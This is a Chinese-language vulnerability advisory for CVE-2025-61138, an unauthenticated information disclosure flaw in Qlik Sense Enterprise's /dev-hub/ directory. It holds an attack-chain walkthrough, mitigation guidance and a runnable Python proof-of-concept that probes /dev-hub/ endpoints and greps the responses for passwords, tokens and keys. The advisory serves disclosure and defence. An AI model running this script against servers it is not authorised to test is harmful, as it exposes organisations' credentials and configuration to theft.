CVE-2025-61138 Qlik Sense Enterprise信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-61138

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Qlik Sense Enterprise

漏洞概述

CVE-2025-61138是Qlik Sense Enterprise Windows版本中的一个高危信息泄露漏洞。该漏洞存在于14.212.13及之前版本中，攻击者可以通过访问/dev-hub/目录获取敏感的系统信息。Qlik Sense Enterprise是一款企业级商业智能和分析平台，广泛应用于各行业的数据分析和可视化场景。由于该漏洞的CVSS评分为7.5，属于高危级别，且攻击向量为网络形式，无需任何认证即可利用，因此对企业数据安全构成严重威胁。攻击者无需特殊权限或用户交互，即可通过构造特定的HTTP请求访问/dev-hub/目录下的敏感资源，可能导致应用程序配置信息、内部路径结构、API密钥、数据库连接信息等敏感数据泄露。这些信息可被进一步用于横向移动、权限提升或发起更大规模的网络攻击。鉴于该漏洞的严重性和广泛影响，建议受影响用户立即采取修复措施。

技术细节

Qlik Sense Enterprise的/dev-hub/端点存在访问控制不当的安全缺陷。该目录原本设计用于开发人员调试和监控目的，包含多个API接口和诊断工具。然而，系统未对访问权限进行严格验证，导致未经认证的用户可以直接访问这些敏感端点。具体来说，攻击者可以通过发送GET请求到/dev-hub/相关路径，枚举系统目录结构、获取已部署应用的详细信息、查看后端服务配置等敏感内容。该漏洞属于OWASP Top 10中的A01-2021 Broken Access Control类别，反映了典型的访问控制机制失效问题。从攻击复杂度来看，攻击者仅需具备基本的HTTP请求能力即可成功利用，无需复杂的攻击工具或技术知识。漏洞的机密性影响为高，表明泄露的信息可能包含高度敏感的商业或技术数据。

攻击链分析

STEP 1

1. 侦察阶段

攻击者对目标Qlik Sense Enterprise服务器进行端口扫描和服务识别，发现开放的Web服务端口（通常是443或8443）

STEP 2

2. 目标识别

攻击者确认目标运行的是Qlik Sense Enterprise Windows版本，并通过版本探测确定版本号<=14.212.13

STEP 3

3. 漏洞探测

攻击者构造HTTP GET请求访问/dev-hub/目录及其子路径，无需任何认证凭证

STEP 4

4. 信息收集

成功访问后，攻击者获取系统配置信息、API端点列表、内部路径结构、数据库连接信息等敏感数据

STEP 5

5. 数据提取

攻击者通过遍历多个/dev-hub/端点，收集完整的敏感信息清单，可能包括：用户凭证、API密钥、会话令牌、配置详情等

STEP 6

6. 横向移动

利用收集到的敏感信息，攻击者尝试进一步访问后端系统、数据库或其他内部资源，实施权限提升或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61138 PoC - Information Disclosure via /dev-hub/
# Target: Qlik Sense Enterprise Windows <= v14.212.13

import requests
import sys
import re

def check_vulnerability(target_url):
    """
    Check if the target is vulnerable to CVE-2025-61138
    """
    # Add trailing slash if not present
    if not target_url.endswith('/'):
        target_url += '/'
    
    # Endpoints to test for information disclosure
    endpoints = [
        'dev-hub/',
        'dev-hub/api/',
        'dev-hub/qrs/',
        'dev-hub/qrs/about',
        'dev-hub/diagnostic/',
        'dev-hub/monitor/',
        'dev-hub/audit/'
    ]
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] Target: Qlik Sense Enterprise Windows <= v14.212.13")
    print(f"[*] Vulnerability: Information Disclosure via /dev-hub/ directory")
    print("=" * 60)
    
    vulnerable = False
    
    for endpoint in endpoints:
        url = target_url + endpoint
        print(f"\n[>] Testing: {url}")
        
        try:
            response = requests.get(url, timeout=10, verify=False)
            
            if response.status_code == 200:
                content = response.text
                
                # Check for sensitive information patterns
                sensitive_patterns = [
                    r'(?i)(password|secret|key|token)',
                    r'(?i)(connection|database|sql)',
                    r'(?i)(api[_-]?key|access[_-]?token)',
                    r'(?i)(internal|confidential|private)',
                    r'\b[A-Za-z0-9]{32,}\b',  # Long alphanumeric strings
                    r'(?i)(path|directory|folder)',
                    r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',  # IP addresses
                ]
                
                found_sensitive = False
                for pattern in sensitive_patterns:
                    if re.search(pattern, content):
                        found_sensitive = True
                        print(f"[!] Potential sensitive data found (pattern: {pattern})")
                
                if found_sensitive or len(content) > 1000:
                    print(f"[+] VULNERABLE! Status: {response.status_code}")
                    print(f"[+] Response length: {len(content)} bytes")
                    print(f"[+] Sample content:\n{content[:500]}...")
                    vulnerable = True
                else:
                    print(f"[*] Endpoint accessible but no obvious sensitive data")
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] Protected: {response.status_code}")
            else:
                print(f"[-] Status: {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[X] Error: {str(e)}")
    
    print("\n" + "=" * 60)
    if vulnerable:
        print("[!] Target is VULNERABLE to CVE-2025-61138")
        print("[!] Recommendation: Apply vendor patch immediately")
    else:
        print("[*] Target may not be vulnerable or /dev-hub/ not exposed")
    
    return vulnerable

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-61138.py <target_url>")
        print("Example: python cve-2025-61138.py https://qlikserver.example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)

影响范围

Qlik Sense Enterprise Windows <= 14.212.13

防御指南

临时缓解措施

作为临时缓解措施，建议管理员立即在Web服务器或负载均衡器层面屏蔽或限制对/dev-hub/目录的访问。具体操作包括：1) 检查Nginx/Apache/IIS等Web服务器的访问控制配置，添加针对/dev-hub/路径的访问限制规则；2) 如果/dev-hub/功能非业务必需，考虑直接删除或重命名该目录；3) 配置IP白名单，仅允许来自管理网段的访问；4) 启用强制HTTPS并配置严格的内容安全策略(CSP)；5) 监控所有对/dev-hub/路径的访问请求，对异常访问模式进行告警。同时建议尽快应用官方安全更新，并在测试环境验证后再部署到生产系统。